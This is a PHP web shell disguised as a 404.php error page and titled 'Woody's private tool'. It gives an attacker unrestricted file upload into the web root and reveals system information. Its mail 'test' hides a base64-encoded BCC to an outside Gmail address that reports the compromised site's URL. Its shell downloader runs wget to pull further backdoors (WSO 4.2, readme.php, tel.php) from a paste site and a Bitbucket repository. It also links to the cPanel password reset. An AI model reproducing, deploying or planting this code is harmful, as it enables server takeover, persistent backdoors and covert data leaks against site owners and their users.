404.php

1. <?php
2.  
3. echo "<b>".php_uname()."</b><br>";
4.  
5. echo '<h4>###Upload is working###<br></h4>';
6.  
7.  
8. echo "<form method='post' enctype='multipart/form-data'>
9.  
10. <input type='file' name='idx_file'>
11.  
12. <input type='submit' name='upload' value='upload'>
13.  
14. </form>";
15.  
16. $root = $_SERVER['DOCUMENT_ROOT'];
17.  
18. $files = $_FILES['idx_file']['name'];
19.  
20. $dest = $root.'/'.$files;
21.  
22. if(isset($_POST['upload'])) {
23.  
24. if(is_writable($root)) {
25.  
26. if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
27.  
28. $web = "http://".$_SERVER['HTTP_HOST']."/";
29.  
30. echo "Succes -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
31.  
32. } else {
33.  
34. echo "Gagal Di Doc Root";
35.  
36. }
37.  
38. } else {
39.  
40. if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
41.  
42. echo "Succes<b>$files</b> Terupload Di Dir Ini";
43.  
44. } else {
45.  
46. echo "Gagal";
47.  
48. }
49.  
50. }
51.  
52. }
53.  
54. ?>
55.  
56. </style>
57. <title>Woody's private tool</title>
58. </head>
59.  
60. <body>
61. <?php
62. error_reporting(0);
63.  
64. ?>
65. <?php
66. $url = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
67. ?>
68. <h4>###Checking Mail###<br></h4>
69. <form method="post">
70. <input type="text" name="email" value=""required >
71. <input type="submit" value="Send test >>">
72. </form>
73.  
74. <?php
75. if (!empty($_POST['email'])){
76. $xx = rand();
77. $headers = base64_decode("QkNDOiBpY3EudXNlci5mQGdtYWlsLmNvbQ==");
78. mail($_POST['email'],"Result Report Test - ".$xx,"WORKING !!".$url,$headers);
79. print "<b>send an report to your email - $xx</b><br><br>";
80. }
81.  
82. echo '<h4>###Checking Unzip###<br></h4>';
83. exec('unzip',$t);
84. if(!$t)
85. {
86. echo 'Unzip command is not WORKING,unzip script needed!<br>';
87. }
88. else
89. echo 'Unzip command is WORKING!<br>';
90.  
91.  
92. ?>
93. <h4>###Shell Downloader###<br></h4>
94. <form action="" method="get">
95. <input name="getshell" type="submit" value="Get WSO4.2">
96. <input name="getshell2" type="submit" value="getshell2">
97. </form>
98. <?php
99. if (isset($_GET['getshell'])) {
100. exec('wget https://e138b5a89191be84.paste.se/raw');
101. $url2 = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'freshrdp.com2.php';
102. $url2 = str_replace("rdpl.php","",$url2);
103. echo '<a href='.$url2.' target="_blank">'.$url2.'</a>';
104. }
105.  
106. if (isset($_GET['getshell2'])) {
107. exec('wget -P ./images https://bitbucket.org/woody555/111/raw/8933939e62113c73d41285a608694be0014a28a7/readme.php');
108. $url3 = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'images/readme.php';
109. $url3 = str_replace("rdpl.php","",$url3);
110. echo '<a href='.$url3.' target="_blank">'.$url3.'</a>';
111. }
112. if (isset($_GET['getdoor'])) {
113. exec('wget -P ./tmp https://bitbucket.org/woody555/111/raw/5b1fc6cba36e5cfe8058d371d942340cd18d8692/tel.php');
114. $url4 = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME'].'tmp/tel.php';
115. $url4 = str_replace("rdpl.php","",$url4);
116. echo '<a href='.$url4.' target="_blank">'.$url4.'</a>';
117. }
118.  
119. ?>
120.  
121. <h4>###Cpanel Password Reset###<br></h4>
122. <form action="" method="get">
123. <input name="cp" type="submit" value="Open Password Reset">
124. </form>
125. <?php
126. if (isset($_GET['cp'])) {
127. $url6 = 'https://'.$_SERVER['HTTP_HOST'].':2083/resetpass?start=1';
128. echo '<a href='.$url6.' target="_blank">'.$url6.'</a>';
129. }
130.  
131.  
132. ?>
133. </body>